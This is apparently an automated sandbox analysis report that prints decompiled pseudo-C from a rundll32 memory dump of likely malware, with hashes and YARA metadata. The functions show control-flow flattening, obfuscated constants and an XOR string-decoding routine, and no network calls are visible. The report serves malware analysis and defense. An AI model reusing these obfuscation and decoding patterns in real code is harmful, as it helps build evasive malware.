                                                                                                                      0x0018cb4f
                                                                                                                      0x0018cb59
                                                                                                                      0x0018cb62
                                                                                                                      0x0018cb6f
                                                                                                                      0x0018cb7c
                                                                                                                      0x0018cb84
                                                                                                                      0x0018cb8c
                                                                                                                      0x0018cb94
                                                                                                                      0x0018cb99
                                                                                                                      0x0018cb9e
                                                                                                                      0x0018cba6
                                                                                                                      0x0018cbae
                                                                                                                      0x0018cbb6
                                                                                                                      0x0018cbbe
                                                                                                                      0x0018cbc6
                                                                                                                      0x0018cbcc
                                                                                                                      0x0018cc29
                                                                                                                      0x0018cc2a
                                                                                                                      0x0018cc33
                                                                                                                      0x0018cc39
                                                                                                                      0x0018cc3b
                                                                                                                      0x00000000
                                                                                                                      0x0018cc3b
                                                                                                                      0x0018cbce
                                                                                                                      0x0018cbd4
                                                                                                                      0x0018cc15
                                                                                                                      0x00000000
                                                                                                                      0x0018cbd6
                                                                                                                      0x0018cbd8
                                                                                                                      0x0018cc73
                                                                                                                      0x0018cc79
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0018cbde
                                                                                                                      0x0018cc05
                                                                                                                      0x0018cc0a
                                                                                                                      0x0018cc0f
                                                                                                                      0x0018cc11
                                                                                                                      0x00000000
                                                                                                                      0x0018cc11
                                                                                                                      0x0018cc0f
                                                                                                                      0x0018cbd8
                                                                                                                      0x0018cbd4
                                                                                                                      0x0018cc88
                                                                                                                      0x0018cc88
                                                                                                                      0x0018cc66
                                                                                                                      0x0018cc6b
                                                                                                                      0x0018cc6e
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ;<$sC
                                                                                                                      • API String ID: 0-4190640370
                                                                                                                      • Opcode ID: afae9e4ec36a9a9b8992dcbfdbb27de80e6d34688f14d12214c490c57e1a3fcd
                                                                                                                      • Instruction ID: 2d46cc5f82c597c328e176ddb40994175f64ef88a19731e017178104de1d7fab
                                                                                                                      • Opcode Fuzzy Hash: afae9e4ec36a9a9b8992dcbfdbb27de80e6d34688f14d12214c490c57e1a3fcd
                                                                                                                      • Instruction Fuzzy Hash: BA7112721083819FC758DF25C48A81FBBF2FBD4798F544A1DF59696220C372DA498F86
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0017777B Relevance: 2.7, Strings: 2, Instructions: 162COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E0017777B(void* __ecx, signed int* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				unsigned int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t128;
				signed int _t149;
				signed int _t152;
				signed int _t153;
				signed int _t154;
				signed int _t155;
				void* _t158;
				signed int* _t179;
				void* _t181;
				void* _t182;

				_push(_a16);
				_t178 = _a4;
				_t179 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0017CF25(_t128);
				_v104 = 0x8623b;
				_t182 = _t181 + 0x18;
				_v104 = _v104 + 0xffff31eb;
				_v104 = _v104 | 0x66daf122;
				_t158 = 0xd040992;
				_t152 = 0x22;
				_v104 = _v104 / _t152;
				_v104 = _v104 ^ 0x03069644;
				_v100 = 0x2bbbe;
				_t153 = 0x14;
				_v100 = _v100 * 0xf;
				_v100 = _v100 / _t153;
				_v100 = _v100 | 0x351d3417;
				_v100 = _v100 ^ 0x351dc123;
				_v72 = 0xab81ef;
				_v72 = _v72 >> 0xd;
				_v72 = _v72 ^ 0x000a49b6;
				_v76 = 0x16a933;
				_v76 = _v76 ^ 0xe7c1b086;
				_v76 = _v76 ^ 0xe7d23b20;
				_v60 = 0x52cbe;
				_t154 = 0x2d;
				_v60 = _v60 * 0x6f;
				_v60 = _v60 ^ 0x023eaa51;
				_v84 = 0x759948;
				_v84 = _v84 + 0x9b78;
				_v84 = _v84 ^ 0xc5583688;
				_v84 = _v84 ^ 0xc523a4cd;
				_v88 = 0xf8b174;
				_v88 = _v88 << 0xa;
				_v88 = _v88 | 0xb04365c9;
				_v88 = _v88 ^ 0xf2c73fc1;
				_v64 = 0x1cff55;
				_v64 = _v64 / _t154;
				_v64 = _v64 ^ 0x000b3edd;
				_v68 = 0x9a9e72;
				_v68 = _v68 + 0xffffcb3f;
				_v68 = _v68 ^ 0x009b4266;
				_v92 = 0x7b2ebb;
				_v92 = _v92 << 0xb;
				_v92 = _v92 ^ 0xf233ff82;
				_v92 = _v92 ^ 0x2b4dc82a;
				_v96 = 0x6d21c4;
				_v96 = _v96 ^ 0x8acf53c4;
				_v96 = _v96 + 0xffff3a52;
				_v96 = _v96 | 0xe5741bb4;
				_v96 = _v96 ^ 0xeff12f72;
				_v56 = 0x5c5116;
				_v56 = _v56 + 0xffff598a;
				_v56 = _v56 ^ 0x00573a27;
				_v80 = 0xae67f2;
				_v80 = _v80 + 0x56e4;
				_t155 = 0x50;
				_v80 = _v80 / _t155;
				_v80 = _v80 ^ 0x0002e359;
				do {
					while(_t158 != 0x253e674) {
						if(_t158 == 0x4f8855c) {
							E0018F88F(_t178 + 4,  &_v52, __eflags, _v96, _v56, _v80);
						} else {
							if(_t158 == 0x5caea7a) {
								E00184D91( *_t178,  &_v52, _v68, _v92);
								_t182 = _t182 + 8;
								_t158 = 0x4f8855c;
								continue;
							} else {
								if(_t158 == 0x9ad54af) {
									_push(_t158);
									_push(_t158);
									_t149 = E00183512(_t179[1]);
									 *_t179 = _t149;
									__eflags = _t149;
									if(__eflags != 0) {
										_t158 = 0x253e674;
										continue;
									}
								} else {
									if(_t158 == 0xa436207) {
										_t179[1] = E0018109E(_t178);
										_t158 = 0x9ad54af;
										continue;
									} else {
										if(_t158 != 0xd040992) {
											goto L13;
										} else {
											_t158 = 0xa436207;
											 *_t179 =  *_t179 & 0x00000000;
											_t179[1] = _v104;
											continue;
										}
									}
								}
							}
						}
						L16:
						__eflags =  *_t179;
						_t127 =  *_t179 != 0;
						__eflags = _t127;
						return 0 | _t127;
					}
					E001864C5(_v60, _v84, _v88, _v64, _t179,  &_v52);
					_t182 = _t182 + 0x10;
					_t158 = 0x5caea7a;
					L13:
					__eflags = _t158 - 0x12a0183;
				} while (__eflags != 0);
				goto L16;
			}



























                                                                                                                      0x00177782
                                                                                                                      0x00177789
                                                                                                                      0x00177790
                                                                                                                      0x00177792
                                                                                                                      0x00177799
                                                                                                                      0x001777a0
                                                                                                                      0x001777a1
                                                                                                                      0x001777a2
                                                                                                                      0x001777a3
                                                                                                                      0x001777a8
                                                                                                                      0x001777b0
                                                                                                                      0x001777b3
                                                                                                                      0x001777bd
                                                                                                                      0x001777c5
                                                                                                                      0x001777d0
                                                                                                                      0x001777d5
                                                                                                                      0x001777db
                                                                                                                      0x001777e3
                                                                                                                      0x001777f0
                                                                                                                      0x001777f3
                                                                                                                      0x001777ff
                                                                                                                      0x00177803
                                                                                                                      0x0017780b
                                                                                                                      0x00177813
                                                                                                                      0x0017781b
                                                                                                                      0x00177820
                                                                                                                      0x00177828
                                                                                                                      0x00177830
                                                                                                                      0x00177838
                                                                                                                      0x00177840
                                                                                                                      0x0017784d
                                                                                                                      0x0017784e
                                                                                                                      0x00177852
                                                                                                                      0x0017785a
                                                                                                                      0x00177862
                                                                                                                      0x0017786a
                                                                                                                      0x00177872
                                                                                                                      0x0017787a
                                                                                                                      0x00177882
                                                                                                                      0x00177887
                                                                                                                      0x0017788f
                                                                                                                      0x00177897
                                                                                                                      0x001778a5
                                                                                                                      0x001778a9
                                                                                                                      0x001778b1
                                                                                                                      0x001778b9
                                                                                                                      0x001778c1
                                                                                                                      0x001778c9
                                                                                                                      0x001778d1
                                                                                                                      0x001778d6
                                                                                                                      0x001778de
                                                                                                                      0x001778e6
                                                                                                                      0x001778ee
                                                                                                                      0x001778f6
                                                                                                                      0x001778fe
                                                                                                                      0x00177906
                                                                                                                      0x0017790e
                                                                                                                      0x00177916
                                                                                                                      0x0017791e
                                                                                                                      0x00177926
                                                                                                                      0x0017792e
                                                                                                                      0x0017793e
                                                                                                                      0x0017794b
                                                                                                                      0x0017794f
                                                                                                                      0x00177957
                                                                                                                      0x00177957
                                                                                                                      0x00177965
                                                                                                                      0x00177a30
                                                                                                                      0x0017796b
                                                                                                                      0x00177971
                                                                                                                      0x001779da
                                                                                                                      0x001779df
                                                                                                                      0x001779e2
                                                                                                                      0x00000000
                                                                                                                      0x00177973
                                                                                                                      0x00177979
                                                                                                                      0x001779b6
                                                                                                                      0x001779b7
                                                                                                                      0x001779bb
                                                                                                                      0x001779c0
                                                                                                                      0x001779c4
                                                                                                                      0x001779c6
                                                                                                                      0x001779c8
                                                                                                                      0x00000000
                                                                                                                      0x001779c8
                                                                                                                      0x0017797b
                                                                                                                      0x0017797d
                                                                                                                      0x001779a0
                                                                                                                      0x001779a3
                                                                                                                      0x00000000
                                                                                                                      0x0017797f
                                                                                                                      0x00177985
                                                                                                                      0x00000000
                                                                                                                      0x0017798b
                                                                                                                      0x0017798f
                                                                                                                      0x00177991
                                                                                                                      0x00177994
                                                                                                                      0x00000000
                                                                                                                      0x00177994
                                                                                                                      0x00177985
                                                                                                                      0x0017797d
                                                                                                                      0x00177979
                                                                                                                      0x00177971
                                                                                                                      0x00177a38
                                                                                                                      0x00177a3a
                                                                                                                      0x00177a3f
                                                                                                                      0x00177a3f
                                                                                                                      0x00177a46
                                                                                                                      0x00177a46
                                                                                                                      0x00177a02
                                                                                                                      0x00177a07
                                                                                                                      0x00177a0a
                                                                                                                      0x00177a0f
                                                                                                                      0x00177a0f
                                                                                                                      0x00177a0f
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ':W$V
                                                                                                                      • API String ID: 0-741684166
                                                                                                                      • Opcode ID: 9df797d2c0240c8d82362af42228f8b3359936822f393b3d4966278af40eae7f
                                                                                                                      • Instruction ID: cc86a366674e86b7cd53822bbf57393065a3c4cb49c4750b31573c6c90ecae71
                                                                                                                      • Opcode Fuzzy Hash: 9df797d2c0240c8d82362af42228f8b3359936822f393b3d4966278af40eae7f
                                                                                                                      • Instruction Fuzzy Hash: 7B615475109342AFC768DF21C88991FBBF1FBD8318F50991CF2DA96260D3758A098F42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0018EBFF Relevance: 2.6, Strings: 2, Instructions: 129COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E0018EBFF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void* _t91;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				void* _t114;
				void* _t116;
				void* _t131;
				void* _t132;

				_push(_a12);
				_t131 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0017CF25(_t91);
				_v28 = 0x7108be;
				_v28 = _v28 + 0x734d;
				_v28 = _v28 + 0xa8e4;
				_t132 = 0;
				_v28 = _v28 + 0xffff8493;
				_t114 = 0xcca5bf9;
				_v28 = _v28 ^ 0x0074778b;
				_v20 = 0xc2a60c;
				_v20 = _v20 >> 5;
				_v20 = _v20 ^ 0x558996ec;
				_v20 = _v20 ^ 0x55851de9;
				_v12 = 0x41ee29;
				_t21 =  &_v12; // 0x41ee29
				_t109 = 0x29;
				_v12 =  *_t21 * 0x26;
				_v12 = _v12 ^ 0x09c82f39;
				_v32 = 0x1f5650;
				_v32 = _v32 >> 1;
				_v32 = _v32 / _t109;
				_v32 = _v32 ^ 0xe76a4887;
				_v32 = _v32 ^ 0xe76186a0;
				_v36 = 0x15f4a6;
				_v36 = _v36 | 0x84842460;
				_v36 = _v36 + 0x9b66;
				_t110 = 0x43;
				_v36 = _v36 / _t110;
				_v36 = _v36 ^ 0x01f36aaa;
				_v4 = 0xe58fa8;
				_v4 = _v4 >> 0xf;
				_v4 = _v4 ^ 0x0008ca28;
				_v8 = 0x294ac3;
				_v8 = _v8 + 0xffff78db;
				_v8 = _v8 ^ 0x0024bdda;
				_v16 = 0xcf6d8f;
				_v16 = _v16 >> 5;
				_v16 = _v16 + 0x1116;
				_v16 = _v16 ^ 0x000942b4;
				_v24 = 0xd07c42;
				_v24 = _v24 | 0x50b68ca9;
				_t111 = 0x74;
				_v24 = _v24 / _t111;
				_v24 = _v24 << 3;
				_v24 = _v24 ^ 0x05925fb7;
				while(_t114 != 0x2cca53b) {
					if(_t114 == 0x3850c59) {
						E001768DE(_v4, _v8, _v16, _v24,  *0x195214);
					} else {
						if(_t114 == 0xcca5bf9) {
							_push(_t114);
							_push(_t114);
							_t116 = 0x50;
							 *0x195214 = E00183512(_t116);
							_t114 = 0xd9a7a55;
							continue;
						} else {
							if(_t114 == 0xd96b1a6) {
								_t132 = E0018EE11(_t131, _v32, _v36, _a8);
								if(_t132 == 0) {
									_t114 = 0x2cca53b;
									continue;
								}
							} else {
								if(_t114 != 0xd9a7a55) {
									L12:
									if(_t114 != 0xca68b5e) {
										continue;
									} else {
									}
								} else {
									if(E00190D5B() != 0) {
										_t114 = 0xd96b1a6;
										continue;
									}
								}
							}
						}
					}
					return _t132;
				}
				E00176D80();
				_t114 = 0x3850c59;
				goto L12;
			}




















                                                                                                                      0x0018ec06
                                                                                                                      0x0018ec0a
                                                                                                                      0x0018ec0c
                                                                                                                      0x0018ec10
                                                                                                                      0x0018ec14
                                                                                                                      0x0018ec15
                                                                                                                      0x0018ec16
                                                                                                                      0x0018ec1b
                                                                                                                      0x0018ec26
                                                                                                                      0x0018ec30
                                                                                                                      0x0018ec38
                                                                                                                      0x0018ec3a
                                                                                                                      0x0018ec42
                                                                                                                      0x0018ec47
                                                                                                                      0x0018ec54
                                                                                                                      0x0018ec5c
                                                                                                                      0x0018ec61
                                                                                                                      0x0018ec69
                                                                                                                      0x0018ec71
                                                                                                                      0x0018ec79
                                                                                                                      0x0018ec80
                                                                                                                      0x0018ec83
                                                                                                                      0x0018ec87
                                                                                                                      0x0018ec8f
                                                                                                                      0x0018ec97
                                                                                                                      0x0018eca3
                                                                                                                      0x0018eca7
                                                                                                                      0x0018ecaf
                                                                                                                      0x0018ecb7
                                                                                                                      0x0018ecbf
                                                                                                                      0x0018ecc7
                                                                                                                      0x0018ecd3
                                                                                                                      0x0018ecd8
                                                                                                                      0x0018ecde
                                                                                                                      0x0018ece6
                                                                                                                      0x0018ecee
                                                                                                                      0x0018ecf3
                                                                                                                      0x0018ecfb
                                                                                                                      0x0018ed03
                                                                                                                      0x0018ed0b
                                                                                                                      0x0018ed13
                                                                                                                      0x0018ed1b
                                                                                                                      0x0018ed20
                                                                                                                      0x0018ed28
                                                                                                                      0x0018ed30
                                                                                                                      0x0018ed38
                                                                                                                      0x0018ed44
                                                                                                                      0x0018ed4c
                                                                                                                      0x0018ed50
                                                                                                                      0x0018ed55
                                                                                                                      0x0018ed5d
                                                                                                                      0x0018ed63
                                                                                                                      0x0018edff
                                                                                                                      0x0018ed69
                                                                                                                      0x0018ed6f
                                                                                                                      0x0018edbc
                                                                                                                      0x0018edbd
                                                                                                                      0x0018edc0
                                                                                                                      0x0018edc8
                                                                                                                      0x0018edcd
                                                                                                                      0x00000000
                                                                                                                      0x0018ed71
                                                                                                                      0x0018ed77
                                                                                                                      0x0018eda4
                                                                                                                      0x0018edaa
                                                                                                                      0x0018edac
                                                                                                                      0x00000000
                                                                                                                      0x0018edac
                                                                                                                      0x0018ed79
                                                                                                                      0x0018ed7f
                                                                                                                      0x0018eddb
                                                                                                                      0x0018ede1
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0018ede7
                                                                                                                      0x0018ed81
                                                                                                                      0x0018ed88
                                                                                                                      0x0018ed8a
                                                                                                                      0x00000000
                                                                                                                      0x0018ed8a
                                                                                                                      0x0018ed88
                                                                                                                      0x0018ed7f
                                                                                                                      0x0018ed77
                                                                                                                      0x0018ed6f
                                                                                                                      0x0018ee10
                                                                                                                      0x0018ee10
                                                                                                                      0x0018edd4
                                                                                                                      0x0018edd9
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )A$Ms
                                                                                                                      • API String ID: 0-3843022149
                                                                                                                      • Opcode ID: a54aefe30b8b4e0f59769399081bd7d442c2678bd3257d1100b2f14490b65794
                                                                                                                      • Instruction ID: 674fc5c9a072fba81fa24a4bef04255ecd7eb58b70de32cc5c309f830b15feee
                                                                                                                      • Opcode Fuzzy Hash: a54aefe30b8b4e0f59769399081bd7d442c2678bd3257d1100b2f14490b65794
                                                                                                                      • Instruction Fuzzy Hash: 565156716093019FC748DF65D88A81BBBF2FBD8758F008A1DF58556260D372DA4A8F83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00191993 Relevance: 2.6, Strings: 2, Instructions: 111COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E00191993(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _t120;
				signed int _t126;
				signed int _t127;
				intOrPtr _t138;

				_push(_a16);
				_push(_a12);
				_v52 = 0x104;
				_push(0x104);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0017CF25(0x104);
				_v68 = 0x5658b2;
				_t138 = 0;
				_v64 = 0x871b59;
				_v60 = 0xa8976a;
				_v56 = 0;
				_v40 = 0xee5304;
				_v40 = _v40 >> 0xa;
				_v40 = _v40 ^ 0x00002b94;
				_v24 = 0xe2229b;
				_v24 = _v24 >> 2;
				_v24 = _v24 << 0xa;
				_v24 = _v24 ^ 0xe22b2fd9;
				_v8 = 0x13a34a;
				_t126 = 0x7b;
				_v8 = _v8 * 0x58;
				_v8 = _v8 * 0x7c;
				_v8 = _v8 >> 6;
				_v8 = _v8 ^ 0x01172ec8;
				_v16 = 0x4f354;
				_t127 = 0x1c;
				_v16 = _v16 / _t126;
				_v16 = _v16 | 0x38cda962;
				_v16 = _v16 << 7;
				_v16 = _v16 ^ 0x66d4d439;
				_v12 = 0x949837;
				_v12 = _v12 ^ 0x28b93813;
				_v12 = _v12 + 0xffff414d;
				_v12 = _v12 + 0xcc4e;
				_v12 = _v12 ^ 0x282f8cad;
				_v44 = 0x4b103d;
				_v44 = _v44 + 0xffffdccd;
				_v44 = _v44 ^ 0x0043fba2;
				_v28 = 0xbeb96;
				_v28 = _v28 + 0xffffd9aa;
				_v28 = _v28 >> 0xd;
				_v28 = _v28 ^ 0x000a38bb;
				_v48 = 0xb1bdc9;
				_v48 = _v48 + 0x24fd;
				_v48 = _v48 ^ 0x00b0c363;
				_v36 = 0x53e429;
				_v36 = _v36 + 0xffff530c;
				_v36 = _v36 / _t127;
				_v36 = _v36 ^ 0x0005d2bf;
				_v20 = 0xb0734b;
				_v20 = _v20 | 0x98e9e8ae;
				_v20 = _v20 + 0x857e;
				_v20 = _v20 << 3;
				_v20 = _v20 ^ 0xc7d86034;
				_v32 = 0x655a5c;
				_v32 = _v32 >> 8;
				_v32 = _v32 | 0x0e60c7ff;
				_v32 = _v32 ^ 0x0e677ecd;
				_t120 = E00183C1B(_t127, _a16, _v40);
				_t137 = _t120;
				if(_t120 != 0) {
					_t138 = E00181785(_a4, _v16, _v12, _t127, _v44, _t137, _v28,  &_v52);
					E00184DAD(_v48, _v36, _t137, _v20, _v32);
				}
				return _t138;
			}























                                                                                                                      0x0019199b
                                                                                                                      0x001919a3
                                                                                                                      0x001919a6
                                                                                                                      0x001919a9
                                                                                                                      0x001919aa
                                                                                                                      0x001919ad
                                                                                                                      0x001919ae
                                                                                                                      0x001919af
                                                                                                                      0x001919b4
                                                                                                                      0x001919bb
                                                                                                                      0x001919bd
                                                                                                                      0x001919c7
                                                                                                                      0x001919d0
                                                                                                                      0x001919d3
                                                                                                                      0x001919da
                                                                                                                      0x001919de
                                                                                                                      0x001919e5
                                                                                                                      0x001919ec
                                                                                                                      0x001919f0
                                                                                                                      0x001919f4
                                                                                                                      0x001919fb
                                                                                                                      0x00191a08
                                                                                                                      0x00191a0b
                                                                                                                      0x00191a12
                                                                                                                      0x00191a15
                                                                                                                      0x00191a19
                                                                                                                      0x00191a20
                                                                                                                      0x00191a2c
                                                                                                                      0x00191a2d
                                                                                                                      0x00191a32
                                                                                                                      0x00191a39
                                                                                                                      0x00191a3d
                                                                                                                      0x00191a44
                                                                                                                      0x00191a4b
                                                                                                                      0x00191a52
                                                                                                                      0x00191a59
                                                                                                                      0x00191a60
                                                                                                                      0x00191a67
                                                                                                                      0x00191a6e
                                                                                                                      0x00191a75
                                                                                                                      0x00191a7c
                                                                                                                      0x00191a83
                                                                                                                      0x00191a8a
                                                                                                                      0x00191a8e
                                                                                                                      0x00191a95
                                                                                                                      0x00191a9c
                                                                                                                      0x00191aa3
                                                                                                                      0x00191aaa
                                                                                                                      0x00191ab1
                                                                                                                      0x00191abd
                                                                                                                      0x00191ac0
                                                                                                                      0x00191ac7
                                                                                                                      0x00191ace
                                                                                                                      0x00191ad5
                                                                                                                      0x00191adc
                                                                                                                      0x00191ae0
                                                                                                                      0x00191ae7
                                                                                                                      0x00191aee
                                                                                                                      0x00191af2
                                                                                                                      0x00191af9
                                                                                                                      0x00191b0d
                                                                                                                      0x00191b15
                                                                                                                      0x00191b19
                                                                                                                      0x00191b38
                                                                                                                      0x00191b44
                                                                                                                      0x00191b49
                                                                                                                      0x00191b53

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )S$\Ze
                                                                                                                      • API String ID: 0-2852868822
                                                                                                                      • Opcode ID: 14dd94e2abf50960c8006a45da92ac01b723b2d7fa089378cd4194b745656b67
                                                                                                                      • Instruction ID: d91376361eb94388fab9d87a01a817c9ee5fb9a64f189ef8c01f328a85dc6d68
                                                                                                                      • Opcode Fuzzy Hash: 14dd94e2abf50960c8006a45da92ac01b723b2d7fa089378cd4194b745656b67
                                                                                                                      • Instruction Fuzzy Hash: 135102B2C00209EBCF49DFE5D98A8DEFBB5FB48704F208159E511B6250D3B54A55CFA4
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0017BB4B Relevance: 2.6, Strings: 2, Instructions: 91COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E0017BB4B(void* __ecx, void* __edx, void* __eflags) {
				signed int* _t50;
				signed int _t52;
				unsigned int* _t65;
				signed int _t66;
				signed int _t68;
				signed int _t75;
				unsigned int _t76;
				unsigned int _t77;
				unsigned int* _t80;
				signed int* _t81;
				signed int* _t82;
				unsigned int _t84;
				void* _t90;
				void* _t92;
				void* _t94;
				void* _t95;

				_push( *((intOrPtr*)(_t94 + 0x18)));
				_push( *(_t94 + 0x24));
				_push(__ecx);
				_t50 = E0017CF25( *((intOrPtr*)(_t94 + 0x18)));
				 *(_t94 + 0x20) = 0xfe2925;
				_t4 =  &(_t50[1]); // 0x4
				_t81 = _t4;
				 *(_t94 + 0x20) =  *(_t94 + 0x20) + 0x7128;
				 *(_t94 + 0x20) =  *(_t94 + 0x20) | 0x09a7dad2;
				 *(_t94 + 0x20) =  *(_t94 + 0x20) + 0xffff7390;
				 *(_t94 + 0x20) =  *(_t94 + 0x20) ^ 0x09fc0087;
				 *(_t94 + 0x1c) = 0x6df10d;
				 *(_t94 + 0x1c) =  *(_t94 + 0x1c) << 0xa;
				 *(_t94 + 0x1c) =  *(_t94 + 0x1c) + 0xffff9bae;
				 *(_t94 + 0x1c) =  *(_t94 + 0x1c) + 0x6e9b;
				 *(_t94 + 0x1c) =  *(_t94 + 0x1c) ^ 0xb7c65291;
				 *(_t94 + 0x34) = 0x26c28e;
				 *(_t94 + 0x34) =  *(_t94 + 0x34) + 0x9999;
				 *(_t94 + 0x34) =  *(_t94 + 0x34) + 0x5997;
				 *(_t94 + 0x34) =  *(_t94 + 0x34) + 0x3e8;
				 *(_t94 + 0x34) =  *(_t94 + 0x34) ^ 0x0028604d;
				_t68 =  *_t50;
				_t82 =  &(_t81[1]);
				_t52 =  *_t81 ^ _t68;
				 *(_t94 + 0x24) = _t68;
				 *(_t94 + 0x28) = _t52;
				_t33 = _t52 + 1; // 0x1
				_t84 =  !=  ? (_t33 & 0xfffffffc) + 4 : _t33;
				_t95 = _t94 + 8;
				_t65 = E00183512(_t84);
				 *(_t95 + 0x2c) = _t65;
				if(_t65 != 0) {
					_t92 = 0;
					_t80 = _t65;
					_t90 =  >  ? 0 :  &(_t82[_t84 >> 2]) - _t82 + 3 >> 2;
					if(_t90 != 0) {
						_t66 =  *(_t95 + 0x18);
						do {
							_t75 =  *_t82;
							_t82 =  &(_t82[1]);
							_t76 = _t75 ^ _t66;
							 *_t80 = _t76;
							_t80 =  &(_t80[1]);
							_t77 = _t76 >> 0x10;
							 *((char*)(_t80 - 3)) = _t76 >> 8;
							 *(_t80 - 2) = _t77;
							_t92 = _t92 + 1;
							 *((char*)(_t80 - 1)) = _t77 >> 8;
						} while (_t92 < _t90);
						_t65 =  *(_t95 + 0x28);
					}
					 *((char*)(_t65 +  *((intOrPtr*)(_t95 + 0x1c)))) = 0;
				}
				return _t65;
			}



















                                                                                                                      0x0017bb55
                                                                                                                      0x0017bb56
                                                                                                                      0x0017bb5b
                                                                                                                      0x0017bb5c
                                                                                                                      0x0017bb61
                                                                                                                      0x0017bb69
                                                                                                                      0x0017bb69
                                                                                                                      0x0017bb6c
                                                                                                                      0x0017bb74
                                                                                                                      0x0017bb7c
                                                                                                                      0x0017bb84
                                                                                                                      0x0017bb8c
                                                                                                                      0x0017bb94
                                                                                                                      0x0017bb99
                                                                                                                      0x0017bba1
                                                                                                                      0x0017bba9
                                                                                                                      0x0017bbb1
                                                                                                                      0x0017bbb9
                                                                                                                      0x0017bbc1
                                                                                                                      0x0017bbc9
                                                                                                                      0x0017bbd1
                                                                                                                      0x0017bbd9
                                                                                                                      0x0017bbdd
                                                                                                                      0x0017bbe0
                                                                                                                      0x0017bbe2
                                                                                                                      0x0017bbe6
                                                                                                                      0x0017bbea
                                                                                                                      0x0017bbfa
                                                                                                                      0x0017bc05
                                                                                                                      0x0017bc13
                                                                                                                      0x0017bc15
                                                                                                                      0x0017bc1d
                                                                                                                      0x0017bc25
                                                                                                                      0x0017bc27
                                                                                                                      0x0017bc38
                                                                                                                      0x0017bc3d
                                                                                                                      0x0017bc3f
                                                                                                                      0x0017bc43
                                                                                                                      0x0017bc43
                                                                                                                      0x0017bc45
                                                                                                                      0x0017bc48
                                                                                                                      0x0017bc4a
                                                                                                                      0x0017bc51
                                                                                                                      0x0017bc54
